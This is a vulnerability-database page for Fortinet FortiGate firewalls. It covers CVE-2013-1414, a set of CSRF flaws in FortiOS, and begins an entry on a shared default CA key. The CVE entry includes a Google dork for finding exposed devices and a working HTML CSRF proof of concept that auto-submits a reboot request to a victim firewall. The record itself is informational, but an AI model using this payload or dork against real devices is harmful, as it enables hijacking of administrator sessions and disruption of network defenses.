Vulnerabilities related to fortinet - fortigate-620b
var-201307-0030
Vulnerability from variot
Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 5.0.2 allow remote attackers to hijack the authentication of administrators for requests that (1) modify settings, (2) modify policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown. FortiGate devices running FortiOS are prone to a cross-site request-forgery vulnerability. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the device running the affected application. Other attacks are also possible. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPsec/SSL VPN, web content filtering and anti-spam.
Vulnerability ID: CVE-2013-1414
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Product: All Fortigate Firewalls
Vendor: Fortinet http://www.fortinet.com
Vulnerable Version: < 4.3.13 & < 5.0.2
Description
Because many functions are not protected by CSRF tokens, it's possible (under certain conditions) to modify system settings, firewall policies or take control over the whole firewall.
Requirements
An attacker needs to know the IP of the device.
An administrator needs an authenticated connection to the device.
Report-Timeline:
Vendor Notification: 11 July 2012
Vendor released version 5.0.2 / 18 March 2013
Vendor released version 4.3.13 / 29 April 2013
Status: Fixed
Google Dork:
-english -help -printing -companies -archive -wizard -pastebin -adult -keywords "Warning: this page requires Javascript. To correctly view, please enable it in your browser"
Credit:
Sven Wurth dos@net-war.de
PoC
This example will reboot a Fortinet firewall. This is just one of many possibilities to attack this vulnerability.
CSRF - Proof Of Concept
document.myForm.submit();
End PoC
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201307-0030", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "fortios", "scope": "eq", "trust": 1.9, "vendor": "fortinet", "version": "5.0.1" }, { "model": "fortios", "scope": "eq", "trust": 1.9, "vendor": "fortinet", "version": "5.0" }, { "model": "fortios", "scope": "eq", "trust": 1.6, "vendor": "fortinet", 
"version": "4.3.10" }, { "model": "fortios", "scope": "eq", "trust": 1.1, "vendor": "fortinet", "version": "5.0.2" }, { "model": "fortigate-3810a", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-600c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-110c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-310b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-20c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-voice-80c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigaterugged-100c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-3040b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-620b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-300c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-1000c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5001a-sw", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-100d", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-200b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-800c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-60c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5060", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5020", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5001b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", 
"version": null }, { "model": "fortigate-50b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-3950b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-3140b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-1240b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortios", "scope": "lte", "trust": 1.0, "vendor": "fortinet", "version": "4.3.12" }, { "model": "fortigate-5101c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-3240c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-40c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-5140b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-80c", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-311b", "scope": "eq", "trust": 1.0, "vendor": "fortinet", "version": null }, { "model": "fortigate-110c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-1240b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-300c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-3140b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-600c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-100d", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-3950b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-200b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-1000c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": 
null }, { "model": "fortigate-5020", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-5001a-sw", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-620b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-50b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-3240c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-20c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-3040b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-800c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-80c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortios", "scope": "lt", "trust": 0.8, "vendor": "fortinet", "version": "5.x" }, { "model": "fortigate-5060", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-voice-80c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-310b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-3810a", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-5101c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-5001b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-40c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-311b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate-60c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortigate rugged-100c", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { 
"model": "fortigate-5140b", "scope": null, "trust": 0.8, "vendor": "fortinet", "version": null }, { "model": "fortios", "scope": "eq", "trust": 0.6, "vendor": "fortinet", "version": "4.3.12" }, { "model": "fortios b0630", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "fortios b0537", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.8" }, { "model": "fortios b064", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "fortigate-60c", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.0" }, { "model": "fortigate-100d", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "fortigate-1000", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.00" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.6" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.3.5" }, { "model": "fortigate 800f", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "800" }, { "model": "fortigate 620b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 60m", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "60" }, { "model": "fortigate 50am", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 50a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 500a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5000" }, { "model": "fortigate", "scope": "eq", 
"trust": 0.3, "vendor": "fortinet", "version": "500" }, { "model": "fortigate 400a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4000" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "400" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3950" }, { "model": "fortigate 3810a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 3600a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3600" }, { "model": "fortigate 311b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 310b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 3016b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 300a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3000" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "300" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.00" }, { "model": "fortigate 224b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 200b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 200a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "200" }, { "model": "fortigate 1240b", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 100a", "scope": null, "trust": 0.3, "vendor": "fortinet", 
"version": null }, { "model": "fortigate 1000afa2", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate 1000a", "scope": null, "trust": 0.3, "vendor": "fortinet", "version": null }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "1000" }, { "model": "fortigate", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "100" }, { "model": "fortios", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "5.0.3" }, { "model": "fortios", "scope": "ne", "trust": 0.3, "vendor": "fortinet", "version": "4.3.13" } ], "sources": [ { "db": "BID", "id": "60861" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "CNNVD", "id": "CNNVD-201307-116" }, { "db": "NVD", "id": "CVE-2013-1414" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/h:fortinet:fortigaterugged-100c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-1000c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-100d", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-110c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-1240b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-200b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-20c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-300c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-3040b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-310b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-311b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-3140b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-3240c", 
"vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-3810a", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-3950b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-40c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-5001a-sw", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-5001b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-5020", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-5060", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-50b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-5101c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-5140b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-600c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-60c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-620b", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-800c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-80c", "vulnerable": true }, { "cpe22Uri": "cpe:/h:fortinet:fortigate-voice-80c", "vulnerable": true }, { "cpe22Uri": "cpe:/o:fortinet:fortios", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-003232" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sven Wurth", "sources": [ { "db": "BID", "id": "60861" }, { "db": "PACKETSTORM", "id": "122216" } ], "trust": 0.4 }, "cve": "CVE-2013-1414", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { 
"@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "id": "CVE-2013-1414", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "HIGH", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.1, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 4.9, "id": "VHN-61416", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2013-1414", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2013-1414", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201307-116", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-61416", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-61416" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "CNNVD", "id": "CNNVD-201307-116" }, { "db": "NVD", "id": "CVE-2013-1414" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Multiple cross-site request forgery (CSRF) vulnerabilities in Fortinet FortiOS on FortiGate firewall devices before 4.3.13 and 5.x before 
5.0.2 allow remote attackers to hijack the authentication of administrators for requests that modify (1) settings or (2) policies, or (3) restart the device via a rebootme action to system/maintenance/shutdown. (1) Change settings (2) Policy changes (3) Reboot device. FortiGate running FortiOS is prone to a cross-site request-forgery vulnerability. \nExploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the device running the affected application. Other attacks are also possible. Fortinet FortiOS is a set of security operating systems developed by Fortinet Corporation for the FortiGate network security platform. The system provides users with various security functions such as firewall, anti-virus, IPSec/SSL VPN, Web content filtering and anti-spam. Vulnerability ID: CVE-2013-1414\nVulnerability Type: CSRF (Cross-Site Request Forgery)\nProduct: All Fortigate Firewalls\nVendor: Fortinet http://www.fortinet.com\nVulnerable Version: \u003c 4.3.13 \u0026 \u003c 5.0.2\n \nDescription\n==========\nBecause many functions are not protected by CSRF-Tokens, it\u0027s possible (under certain conditions) to modify System-Settings, Firewall-Policies or take control over the hole firewall. \n \nRequirements\n===========\nAn Attacker needs to know the IP of the device. \nAn Administrator needs an authenticated connection to the device. \n \n \nReport-Timeline:\n================\nVendor Notification: 11 July 2012\nVendor released version 5.0.2 / 18 March 2013\nVendor released version 4.3.13 / 29 April 2013\nStatus: Fixed\n \nGoogle Dork:\n==========\n -english -help -printing -companies -archive -wizard -pastebin -adult -keywords \"Warning: this page requires Javascript. To correctly view, please enable it in your browser\"\n \n \nCredit:\n=====\nSven Wurth dos@net-war.de\n \n \nPoC\n====\n \nThis Example will reboot a Fortinet Firewall. \nThis is just one of many possibilities to attack this vulnerability. 
\n \n##### CSRF - Proof Of Concept ####\n\u003chtml\u003e\n\u003cbody onload=\"submitForm()\"\u003e\n\u003cform name=\"myForm\" id=\"myForm\"\n action=\"https://###_VICTIM_IP_###/system/maintenance/shutdown\" method=\"post\"\u003e\n \u003cinput type=\"hidden\" name=\"reason\" value=\"\"\u003e\n \u003cinput type=\"hidden\" name=\"action\" value=\"1\"\u003e\n \u003cinput type=\"submit\" name=\"add\" value=\"rebootme\"\u003e\n\u003c/form\u003e\n\u003cscript type=\u0027text/javascript\u0027\u003edocument.myForm.submit();\u003c/script\u003e\n\u003c/html\u003e\n##### End Poc #####\n \n \n \n \n \n \n", "sources": [ { "db": "NVD", "id": "CVE-2013-1414" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "BID", "id": "60861" }, { "db": "VULHUB", "id": "VHN-61416" }, { "db": "PACKETSTORM", "id": "122216" } ], "trust": 2.07 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-61416", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61416" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2013-1414", "trust": 2.9 }, { "db": "EXPLOIT-DB", "id": "26528", "trust": 1.7 }, { "db": "JVNDB", "id": "JVNDB-2013-003232", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-201307-116", "trust": 0.7 }, { "db": "BID", "id": "60861", "trust": 0.4 }, { "db": "PACKETSTORM", "id": "122216", "trust": 0.2 }, { "db": "SEEBUG", "id": "SSVID-80159", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-61416", "trust": 0.1 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61416" }, { "db": "BID", "id": "60861" 
}, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "PACKETSTORM", "id": "122216" }, { "db": "CNNVD", "id": "CNNVD-201307-116" }, { "db": "NVD", "id": "CVE-2013-1414" } ] }, "id": "VAR-201307-0030", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-61416" } ], "trust": 0.01 }, "last_update_date": "2024-08-14T14:34:19.704000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "FortiGate\u30a2\u30d7\u30e9\u30a4\u30a2\u30f3\u30b9", "trust": 0.8, "url": "http://www.fortinet.co.jp/products/fortigate/" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-003232" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-352", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-61416" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "NVD", "id": "CVE-2013-1414" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 1.7, "url": "http://www.exploit-db.com/exploits/26528/" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-1414" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-1414" }, { "trust": 0.3, "url": "https://www.fortinet.com/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2013-1414" }, { "trust": 0.1, "url": 
"http://www.fortinet.com" }, { "trust": 0.1, "url": "https://###_victim_ip_###/system/maintenance/shutdown\"" } ], "sources": [ { "db": "VULHUB", "id": "VHN-61416" }, { "db": "BID", "id": "60861" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "PACKETSTORM", "id": "122216" }, { "db": "CNNVD", "id": "CNNVD-201307-116" }, { "db": "NVD", "id": "CVE-2013-1414" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-61416" }, { "db": "BID", "id": "60861" }, { "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "db": "PACKETSTORM", "id": "122216" }, { "db": "CNNVD", "id": "CNNVD-201307-116" }, { "db": "NVD", "id": "CVE-2013-1414" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-07-08T00:00:00", "db": "VULHUB", "id": "VHN-61416" }, { "date": "2013-06-28T00:00:00", "db": "BID", "id": "60861" }, { "date": "2013-07-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "date": "2013-06-28T22:13:39", "db": "PACKETSTORM", "id": "122216" }, { "date": "2013-07-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-116" }, { "date": "2013-07-08T17:55:02.783000", "db": "NVD", "id": "CVE-2013-1414" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2013-07-08T00:00:00", "db": "VULHUB", "id": "VHN-61416" }, { "date": "2013-06-28T00:00:00", "db": "BID", "id": "60861" }, { "date": "2013-07-09T00:00:00", "db": "JVNDB", "id": "JVNDB-2013-003232" }, { "date": "2013-07-09T00:00:00", "db": "CNNVD", "id": "CNNVD-201307-116" }, { "date": "2013-07-08T17:55:02.783000", "db": "NVD", "id": "CVE-2013-1414" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { 
"@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-116" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fortinet FortiGate Runs on the device FortiOS Vulnerable to cross-site request forgery", "sources": [ { "db": "JVNDB", "id": "JVNDB-2013-003232" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "cross-site request forgery", "sources": [ { "db": "CNNVD", "id": "CNNVD-201307-116" } ], "trust": 0.6 } }
var-201211-0266
Vulnerability from variot
The default configuration of Fortinet FortiGate UTM appliances uses the same Certification Authority certificate and the same private key across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging the presence of the Fortinet_CA_SSLProxy certificate in a list of trusted root certification authorities. The private key, which has been compromised, allows attackers to create and sign fake certificates. FortiGate UTM appliances have a problem in the handling of the CA certificate: they ship with a common default CA certificate, and its private key is publicly available on the web. Therefore, all devices that use this CA certificate may be affected by this vulnerability. A third party performing a man-in-the-middle attack may eavesdrop on communications or install malware. FortiGate UTM appliances are prone to a security-bypass vulnerability. Successfully exploiting this issue allows attackers to perform man-in-the-middle attacks and gain access to sensitive information; other attacks are also possible. Fortinet FortiGate is a network security platform developed by Fortinet. The platform provides functions such as firewall, antivirus and intrusion prevention (IPS), application control, antispam, wireless controller and WAN acceleration.
